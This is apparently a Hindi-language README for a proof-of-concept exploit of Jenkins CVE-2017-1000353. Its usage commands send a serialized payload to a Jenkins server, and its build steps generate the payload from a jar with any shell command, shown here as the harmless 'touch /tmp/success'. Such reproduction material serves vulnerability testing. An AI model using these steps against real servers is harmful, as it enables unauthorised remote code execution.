
jenkins CVE-2017-1000353 POC
Jenkins CVE-2017-1000353 को कैसे reproduce करें?
इस repository को clone करें, निम्न command के साथ पहले से बने payload jenkins_poc.ser का उपयोग करें:
python exploit.py http://your-ip:8080 jenkins_poc.ser
फिर touch /tmp/success execute हो जाएगा।
Important: Payload generation Java version पर निर्भर करता है। इसे openjdk:8u292 के साथ सफलतापूर्वक test किया गया है। अन्य Java versions payload generation और exploitation के लिए ठीक से काम नहीं कर सकते हैं।
jenkins_poc.ser कैसे generate करें?CVE-2017-1000353-SNAPSHOT-all.jar डाउनलोड करें।
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
यदि आप Docker का उपयोग कर रहे हैं, तो compatibility सुनिश्चित करने के लिए निम्न command का उपयोग कर सकते हैं:
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"